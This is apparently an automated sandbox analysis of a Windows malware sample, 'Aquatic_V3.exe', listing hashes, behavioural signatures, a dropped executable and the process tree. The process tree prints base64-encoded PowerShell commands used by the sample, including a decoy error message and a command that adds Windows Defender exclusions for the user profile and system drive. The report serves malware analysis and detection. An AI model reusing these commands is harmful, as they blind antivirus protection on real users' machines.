Analysis
-
max time kernel
7s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
15-03-2024 06:25
Static task
static1
Behavioral task
behavioral1
Sample
Aquatic_V3.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral2
Sample
Aquatic_V3.exe
Resource
win11-20240221-en
General
-
Target
Aquatic_V3.exe
-
Size
2.8MB
-
MD5
99e3bd9d720cd5225a0a5bc68083bd8d
-
SHA1
7fdc97c76dcee5cbefd2a49425f1c161241047b8
-
SHA256
93a68ff2fad73f03cd57898d381641488800e6f3972a5fcff06426a498383b79
-
SHA512
6070c5445fb24c0a43faace255df0df6928d39af5e48d36bd6104a65147545902e051f70c859fb3e1b940c88745d856351811ae4b63b4fa65d95a12e8b9c5ac7
-
SSDEEP
49152:OVW97XtBjD7X5xbGNrWIxKiaDT6pxdObf+uRTlN4afnm16m+gmoZist:OV8tB7X5tGN6YKiw6pUf+uRTTOIduZiS
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 2996 Winhlp64.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3504 powershell.exe 896 powershell.exe 3504 powershell.exe 896 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3504 powershell.exe Token: SeDebugPrivilege 896 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2316 wrote to memory of 896 2316 Aquatic_V3.exe 79 PID 2316 wrote to memory of 896 2316 Aquatic_V3.exe 79 PID 2316 wrote to memory of 896 2316 Aquatic_V3.exe 79 PID 2316 wrote to memory of 3504 2316 Aquatic_V3.exe 81 PID 2316 wrote to memory of 3504 2316 Aquatic_V3.exe 81 PID 2316 wrote to memory of 3504 2316 Aquatic_V3.exe 81 PID 2316 wrote to memory of 2996 2316 Aquatic_V3.exe 83 PID 2316 wrote to memory of 2996 2316 Aquatic_V3.exe 83
Processes
-
C:\Users\Admin\AppData\Local\Temp\Aquatic_V3.exe"C:\Users\Admin\AppData\Local\Temp\Aquatic_V3.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAagB2ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHMAZAB1ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVABoAGkAcwAgAGEAcABwAGwAaQBjAGEAdABpAG8AbgAgAHIAZQBxAHUAaQByAGUAcwAgAG8AbgBlACAAbwBmACAAdABoAGUAIABmAG8AbABsAG8AdwBpAG4AZwAgAHYAZQByAHMAaQBvAG4AcwAgAG8AZgAgAHQAaABlACAALgBOAEUAVAAgAEYAcgBhAG0AZQB3AG8AcgBrADoAIAB2ADEALgAxAC4ANAAzADIAMgAnACwAJwAnACwAJwBPAEsAJwAsACcAVwBhAHIAbgBpAG4AZwAnACkAPAAjAHoAcAB2ACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:896
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAdQB1ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAaABxACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AYwB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAcABlACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3504
-
-
C:\Users\Admin\AppData\Local\Temp\Winhlp64.exe"C:\Users\Admin\AppData\Local\Temp\Winhlp64.exe"2⤵
- Executes dropped EXE
PID:2996
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d0c46cad6c0778401e21910bd6b56b70
SHA17be418951ea96326aca445b8dfe449b2bfa0dca6
SHA2569600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02
SHA512057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949
-
Filesize
17KB
MD532473e1ac3d512dd0491d2cf503c865c
SHA1e72c41ad818ada929b99d3426a6879555cea1138
SHA25632f21b17ebc78b126207b95fbd9d5156872032cd048614608a89b0215ce9a089
SHA51295240dad4a09277294fbd72d3505a4431a1defc86028ee5ddab92cf17c9469c9915c72a07aac923fa6857175d0785eca0f54d62fdda7e7f5bb1afe31a583636e
-
Filesize
2.8MB
MD55193cb4946d8a5c0e4bcfa2589d2889f
SHA101da27ce3c3aaa705b9e8bc7bf29f4785dbb70a1
SHA256d3c5034163ab5e7b5e6ff2bdb82a5e8c6f3e9adf0474a4e63311944fe1c53811
SHA512d352234b6bf35aa942408eeb4e25dd6acf9081fd70b20cc48250dc8fd29e39a8baebc1c1d118e719ef66841e61144497e93b3f438b799e97eda098a7b866abaf
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82